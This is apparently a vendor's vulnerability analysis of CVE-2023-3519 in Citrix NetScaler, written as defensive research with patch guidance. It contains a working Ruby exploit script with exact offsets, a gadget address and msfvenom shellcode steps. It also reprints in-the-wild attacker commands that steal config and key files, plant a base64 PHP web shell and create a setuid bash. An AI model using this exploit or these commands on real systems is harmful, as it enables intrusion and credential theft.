Technical Analysis
Description
On Tuesday, July 18, Citrix published a security bulletin warning users of three vulnerabilities affecting NetScaler ADC and NetScaler Gateway. Of the three vulnerabilities, CVE-2023-3519, a stack-based buffer overflow, is the most severe and has been confirmed as actively exploited. Successful exploitation allows unauthenticated attackers to execute code remotely on vulnerable systems that have been configured as a gateway.
According to Citrix, the following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
- NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
- NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
- NetScaler ADC and NetScaler Gateway version 12.1
- NetScaler ADC 13.1-FIPS before 13.1-37.159
- NetScaler ADC 12.1-FIPS before 12.1-65.36
- NetScaler ADC 12.1-NDcPP before 12.65.36
On July 21, BishopFox reported that there are about 61,000 potentially vulnerable Citrix appliances on the internet, and suggested that about 35% (21k) were vulnerable at the time.
This analysis will focus on the root cause analysis and exploitation of CVE-2023-3519 using version 13.1-48.47.
Technical analysis
History
In our first pass on analyzing the vulnerability, we noticed a change in several SAML-related functions (including ) that appeared to fix a heap-based buffer overflow when processing certain types of SAML messages. That part of the patch ultimately ended up being a red herring (or possibly an additional vulnerability that was silently patched), but it did lead us to the correct service: , the NetScaler Packet Parsing Engine.ns_aaa_saml_parse_authn_request
/netscaler/nsppe
On July 21, researchers at Assetnote also confirmed the existence of that same issue that we noted; we both noticed that this vulnerability didn’t exactly match the description provided by Citrix. We agreed that there was more to this vulnerability, and that instinct was confirmed when BishopFox later released a video PoC of exploitation through a different vector than the one we’d identified.
BishopFox noted:
The vulnerability that we identified is different from the one identified by Rapid7 in this AttackerKB article and by Assetnote in their analysis, which required SAML to be enabled. The vulnerability we identified only requires the device to be configured as a Gateway or AAA virtual server, and to expose a specific vulnerable route that seems to be enabled by default on some installations, but not others (we’re not yet sure what causes this variance). Given the lack of SAML requirement, we believe that this stack overflow is CVE-2023-3519, and the SAML parser bug is a separate vulnerability which was silently patched without an associated advisory.
On Monday, July 24, Assetnote published a follow-up blog that shed some additional light on the confusion around CVE-2023-3519:
In our last post we uncovered a vulnerability inside Citrix ADC and NetScaler Gateway that was in the patch fix for CVE-2023-3519. It seems that this vulnerability, while also critical, is not the one that is being exploited in the wild by threat actors.
We continued our analysis and discovered an endpoint which allowed for remote code execution without the need of any special configurations such as SAML being enabled. This vulnerability matches more closely with the description of the CVE, Citrix’s advisory and any other public research that has surfaced.
Configuration
With the new information from Assetnote in mind, we needed to configure a host to be a “gateway”, a common configuration that can be done in a few steps:
- Install the Citrix ADC software – This comes in several formats, the simplest to work with is the VMware .ovf, which we used for our analysis
- Upload a license file in the web UI – a dev/test license can be obtained from Citrix (note: requires a free account)
- Configure it as a gateway – This can be accomplished by logging into the web UI and clicking Configuration –> Citrix Gateway –> Citrix Gateway Wizard, keeping the default settings
Once it’s configured as a gateway, it will have a second IP address, which is the IP that this exploit will target.
Dynamic analysis
To assist in our analysis, it’s helpful to debug the running process. Since this appliance is implemented on top of FreeBSD, is the logical choice for debugging. At times it can be a struggle to get the correct exact version of gdb for testing, however, in this scenario, gdb and gdbserver are already available:gdb
root@ns# ls -l /usr/bin/*gdb* -r-xr-xr-x 1 root wheel 7146736 Jun 3 07:03 /usr/bin/gdb -r-xr-xr-x 1 root wheel 54368 Jun 3 07:03 /usr/bin/gdbserver -r-xr-xr-x 1 root wheel 2836856 Jun 3 07:03 /usr/bin/kgdb
With already available, we can go ahead and attach it to the vulnerable process to get a better understanding of the vulnerability. Attaching to a process with requires knowing the PID (process identifier) of the target process. This can be obtained by using the command and looking for the process:gdb
gdb
ps aux
nsppe
root@ns# ps aux | grep nsppe root 11623 99.0 43.0 691272 689460 - RXs 16:44 12:39.03 nsppe (NSPPE-00)
In the case of our setup, the PID is 11623. When attaching to the process with (), we are immediately met with a challenge. Although gdb does attach to the process successfully, almost immediately a system error message appears, which is generated outside of gdb. The message mentions a process called and indicates that it missed five “heartbeats” from the process. As a result, immediately declares a “system failure” and reboots the system, killing our debug session. This is known as a “watchdog timer”, and is very common in embedded systems to ensure a return to a known good state can be achieved in a minimal amount of time.gdb
gdb /netscaler/nsppe 11623
pitboss
nsppe-00
pitboss
In order to use , we will need to disable this watchdog. There are many different approaches to accomplish this task, but the simplest is to search for a built-in mechanism to disable the timer. Since is already present on the device, it is logical that there also might be a simple method to disable the timer. After searching the filesystem and with some analysis of the binary, we came across a Perl script called . Luckily, this script has extensive help output:gdb
gdb
pitboss
nspf
root@ns# nspf help Usage: '/netscaler/nspf ((<process_name> | <pid>) <action> | query)' where <process_name> is one of: NSPPE-00 aslearn awsconfig bgpd de imi isisd metricscollectomonuploadd nsaaad nsaggregatord nscfsyncd nsclfsyncd nsclusterd nsconfigd nscopo nsfsyncd nsgslbautosyncnslcd nslped nsm nsnetsvc nsrised nstraceaggregatnsumond ospf6d ospfd ptpd ripd ripngd snmpd syshealthd 'nsp query' shows the status of all processes listed above Actions common to all processes: 'help'-> Show attributes that can be dynamically set 'pbmonitor'-> register or unregister with pitboss value: ON or 1 or OFF or 0 [...]
Here we can see that or our software watchdog timer can be disabled by using the command and passing it a value of to indicate off. Once disabled, we can use gdb to continue our analysis:pitboss
pbmonitor
0
root@ns# /netscaler/nspf nsppe-00 pbmonitor 0 nspf NSPPE-00 pbmonitor 0 Removing pitboss monitor on process NSPPE-00 pid 11623
The vulnerability
Assetnote’s blog calls out as the vulnerable function. If we compare the old and new versions of the function with a tool such as , we can see a new check in the patched version that ensures a value, which turns out to be a length value, is no more than 0x7f (or 127):ns_aaa_gwtest_get_event_and_target_names
bindiff
c8389d: 83 fb 7f cmp ebx,0x7f c838a0: 7e 16 jle c838b8 <ns_aaa_gwtest_get_event_and_target_names+0x2d8>
The trick, then, is to access that function with an overly long argument. Let’s see how!
Validation
In order to trigger this vulnerability, we need to send an overly long request to the vulnerable endpoint. We can deduce the endpoint and required parameters from the binary and then create a request such as:
$ curl -k 'https://10.0.0.9/gwtest/formssso?event=start&target=AAA' <html><body><b>Http/1.1 Internal Server Error 43549 </b></body> </html>
We can verify that we hit the vulnerable function by setting a breakpoint at the start of the vulnerable function, , using the version of that comes with the server (don’t forget to disable the watchdog if you haven’t, and don’t do this over SSH!):ns_aaa_gwtest_get_event_and_target_names
gdb
root@ns# gdb /netscaler/nsppe 11623 [...] (gdb) b ns_aaa_gwtest_get_event_and_target_names Breakpoint 1 at 0xc82bb4 (gdb) cont Continuing. [...run the above curl command...] Breakpoint 1, 0x0000000000c82bb4 in ns_aaa_gwtest_get_event_and_target_names () (gdb)
It does indeed break at the correct point, which means we’re hitting the vulnerable function!
Next, we validate the vulnerability by sending an overly long request:
$ curl -k 'https://10.0.0.9/gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
We can use to verify that we did, indeed, overwrite the stack, return address and all:gdb
root@ns# gdb /netscaler/nsppe 11623 [...] (gdb) cont Continuing. [...run the curl command here...] Program received signal SIGBUS, Bus error. 0x0000000000c7fad3 in ns_aaa_gwtest_get_valid_fsso_server () (gdb) x/i $rip => 0xc7fad3 <ns_aaa_gwtest_get_valid_fsso_server+147>: ret (gdb) x/xwg $rsp 0x7fffffffc208: 0x4141414141414141 (gdb) backtrace #0 0x0000000000c7fad3 in ns_aaa_gwtest_get_valid_fsso_server () #1 0x4141414141414141 in ?? () #2 0x4141414141414141 in ?? () #3 0x4141414141414141 in ?? () #4 0x4141414141414141 in ?? () #5 0x4141414141414141 in ?? () #6 0x4141414141414141 in ?? () #7 0x4141414141414141 in ?? () #8 0x4141414141414141 in ?? () #9 0x4141414141414141 in ?? () [...]
From that output, we can see that it crashed with a SIGBUS (bus error) when attempting to run a return () statement at offset 0xc7fad3. The top of the stack is the value 0x4141414141414141 (or “AAAAAAAA”), which is the address that the instruction is trying (unsuccessfully) to return to. The backtrace of the stack shows nothing but 0x41414141414141 values, which is what you’d expect to see in a classic stack-overflow scenario.ret
ret
In addition to writing all the way up the stack, we can specifically overwrite the return address by sending the exact right amount of padding. In the example below, we will replace the return address with (0x4242424242424242). We determined this offset by guessing different offsets until it worked, but another common method would be to use Metasploit’s built-in pattern_create.rb. Our updated curl command can be sent as follows:BBBBBBBB
$ curl -k 'https://10.0.0.9/gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB' curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104
After sending that request, we can observe the resulting crash in (reminder that this takes down the networking stack, therefore you will need to do this via the VM console):gdb
root@ns# gdb /netscaler/nsppe 11623 [...] (gdb) cont Continuing. [...send the request...] Program received signal SIGBUS, Bus error. 0x0000000000c7fad3 in ns_aaa_gwtest_get_valid_fsso_server () (gdb) x/i $rip => 0xc7fad3 <ns_aaa_gwtest_get_valid_fsso_server+147>: ret (gdb) x/xwg $rsp 0x7fffffffc208: 0x4242424242424242
It crashes on a instruction, with 0x4242424242424242 on top of the stack this time. That means we successfully overwrote the return address with an arbitrary value!ret
It’s worth noting here that this executable does not have modern memory-corruption mitigations such as ASLR or DEP, which at this point are more than 20 years old. That means that memory addresses don’t change, and that we can run a payload directly from the stack. The following techniques would not work against a system that has modern security defenses enabled.
To prove that we can execute code off the stack, we need to find a gadget () in the binary, which will tell the process to jump to code that is loaded onto the stack. To prove that the code actually runs, we will use a debug breakpoint (, which encodes to ). If successful, this code should tell to stop execution in an obvious way.jmp rsp
ff e4
int3
cc
gdb
A gadget can be found at the address 0x6d8c62 (or, in little endian, ); therefore we build a request with the gadget’s address, followed by a breakpoint character:jmp rsp
\x62\x8c\x6d\x00\x00\x00\x00\x00
$ echo -ne 'GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x62\x8c\x6d\x00\x00\x00\x00\x00\xcc HTTP/1.1\r\nHost: 10.0.0.9\r\n\r\n' | ncat --ssl 10.0.0.9 443
Note that we’re using into now instead of since we need to send raw binary data. encodes all unprintable characters, as per the HTTP standard, but due to a bug in the service’s decoder, this will become problematic for exploitation, which we will discuss this in further detail below.echo
ncat
curl
curl
In our debugger, after sending that code, the breakpoint is hit as expected:
root@ns# gdb /netscaler/nsppe 11623 [...] (gdb) cont Continuing. [...run the command...] Program received signal SIGTRAP, Trace/breakpoint trap. 0x00007fffffffc211 in ?? () (gdb) x/i $rip-1 0x7fffffffc210: int3
This demonstrates that we can run a debug breakpoint directly from the stack, which means that we can run anything from the stack. Now we can begin real exploitation!
Exploitation
To test exploitation, we created a Ruby script that effectively wraps that command from above. The gem, which we’d typically use in this situation, won’t (easily) work because of the requirement for custom URL encoding:ncat
HTTParty
# Encoding: ASCII-8bit # To disable watchdog: nspf nsppe-00 pbmonitor 0 # The return address where we take control: 0xc7fad3 require 'base64' require 'cgi' require 'socket' if ARGV[1].nil? puts "Usage: $0 <target> <payload file>" exit 1 end # The URL encoding of the target is buggy, and values that start with a # letter (in hex) cannot be URL-encoded, but certain other characters # must be; we simply URL-encode everything below 0xa0 for simplicity def my_encode(s) return s.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join end # The amount of padding needed to overwrite the return address RETURN_OFFSET = 168 # The offset of a simple return-to-stack gadget, packed into a little-endian # string JMP_ESP = [0x6d8c62].pack('Q') # Read the payload from the file, and kinda-URIencode it PAYLOAD = my_encode(File.read(ARGV[1]).force_encoding('ASCII-8bit')) # Put everything together into a query string QUERY_STRING = ('A' * RETURN_OFFSET) + JMP_ESP + PAYLOAD # Create the full request FULL_REQUEST = "GET /gwtest/formssso?event=start&target=#{QUERY_STRING} HTTP/1.1\r\nHost: #{ARGV[0]}\r\n\r\n" # Wrap this in `ncat` to simplify SSL stuff system("echo #{Base64::strict_encode64(FULL_REQUEST)} | base64 -d | ncat --ssl #{ARGV[0]} 443") # Done? puts "Done?"
It’s worth specifically calling out the function here. Typically, it would make sense to use the method to properly URL-encode the query string, but the target implements URL decoding incorrectly. If the encoded character is below 0xa0 (like or in a URL), it correctly decodes. But, if the encoded sequence starts with a letter such as or , it will fail to decode and remains the literal string, including the character. Since certain characters will break the request (like ), and others can’t be encoded (like ), in our script we encode everything below and nothing else.my_encode
CGI::escape
%00
%41
%a0
%ff
%
&
%ff
%a0
Shellcode
Now that we’ve proven we can run the world’s simplest shellcode (), we can try increasingly complex shellcodes! Let’s try using to generate a basic payload for 64-bit FreeBSD systems. Fortunately for us, has several FreeBSD payloads, including one that executes a local shell command, which can create a file with the following msfvenom command:int 3
msfvenom
msfvenom
$ msfvenom -p bsd/x64/exec CMD="/usr/bin/touch /root/foobar" > root_foobar.bin No platform was selected, choosing Msf::Module::Platform::BSD from the payload No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 62 bytes
This payload will simply or create an empty file at the location , whose existence we can later validate to prove that the command executed successfully. We use full paths for both the binary and the output file so we aren’t reliant on the variable.touch
/root/foobar
$PATH
Once we have the payload, we can use the Ruby script above to send it. We want to make sure we still have attached to so we can ensure the expected result.:gdb
nsppe
$ ruby cve-2023-3519-poc.rb 10.0.0.9 ./root_foobar.bin
After sending that new payload, we can examine the outcome in . Using the syntax, it is possible to run the command to examine the filesystem from within :gdb
!
ls
gdb
root@ns# gdb /netscaler/nsppe 11623 [...] (gdb) cont Continuing. [...run the payload here...] process 11623 is executing new program: /usr/bin/touch [Inferior 1 (process 11623) exited normally] (gdb) !ls .bash_history foobar
The script successfully sends the payload, and the file is successfully created! If we can run one payload, we should be able to run any payload!/root/foobar
msfvenom
msfvenom
But there is one very important drawback: because this crashes , which is the networking subsystem, we cannot create a reverse shell because the server’s network is completely killed. To develop a reliable exploit, we had to find a way to avoid crashing .nsppe
nsppe
Keeping Alivensppe
To keep the process alive, we opted to use a return address that jumps back to (0x00782403). This address is the function’s epilog where it restores the values of non-volatile registers per the AMD 64 ABI specification. By changing the stack pointer to a predetermined value, this epilog can be used to restore register state and finally pass control flow to its caller, . We have control over the return value and simply set it to 0 through .nsppe
ns_aaa_cookie_valid()
ns_aaa_client_handler()
rax
Now that we can execute code within , we need a way to execute a useful payload. At first we tried to use the syscall; however would replace the current process, which would break network communications. We also tried to use to clone the process, but that would inevitably cause the process to crash. Finally, we settled on using a short assembly stub to call libc’s function. This allows us to execute an OS command as root, without waiting for it to complete. Once the OS command has been started, we adjust the stack and return directly into . The HTTP request receives its response and our payload executes successfully.nsppe
fork()
exec()
fork()
popen()
ns_aaa_cookie_valid()
We are currently working on a Metasploit module, which will be released in the near future!
IOCs
Mandiant reported with high confidence seeing active exploitation of CVE-2023-3519. In their report, they noticed the following behavior within POST requests:
- Coping the NetScaler configuration file ns.conf as well as the F1 and F2 key files into a single destination file within the /var/vpn/themes,
- Creating a web shell info.php by echoing a base64 encoded string to a temporary file and then decoding it using OpenSSL binary present on the appliance
- Coping the regular bash from /usr/bin/bash on the appliance and set the setuid bit of the file to allow easy access to root privileges.
The sequence of commands Mandiant extracted from log files and core dumps were:
- cat /flash/nsconfig/ns.conf >>/var/vpn/themes/insight-new-min.js
- cat /nsconfig/.F1.key >>/var/vpn/themes/insight-new-min.js
- cat /nsconfig/.F2.key >>/var/vpn/themes/insight-new-min.js
- echo PD9waHAgDQpmb3IgKCR4PTA7ICR4PD0xOyAkeCsrKSB7DQogICAgICAgICRDWzFdID0gJF9SRVFVRVNUW yIxMjMiXTsNCiAgICAgICAgQGV2YWwNCiAgICAgICAgKCRDWyR4XS4iIik7DQp9IA0KPz4= > /tmp/cccd.debug
- openssl base64 -d < /tmp/cccd.debug > /var/vpn/themes/info.php
- cp /usr/bin/bash /var/tmp/bash
- chmod 4775 /var/tmp/bash
It is highly likely that both failed, and some successful exploitation attempts will result in the process crashing and creating a core dump that can be found under directory on the ADC. This crash will also cause a system-wide reboot. Any unusual rebooting of an unpatched device should be considered suspicious. It’s also worth noting that this vulnerability grants remote code execution as the root user, which means that a skilled attacker can clean up and remove evidence from local log files.nsppe
/var/core
Guidance
Patches are available for vulnerable versions of NetScaler ADC and NetScaler Gateway and should be applied on an emergency basis. CVE-2023-3519 and the others reported on the advisory are remediated in the following fixed product versions:
- NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases
- NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0
- NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS
- NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS
- NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP
References
原文始发于Rapid7:Lateral Movement With Cobaltstrike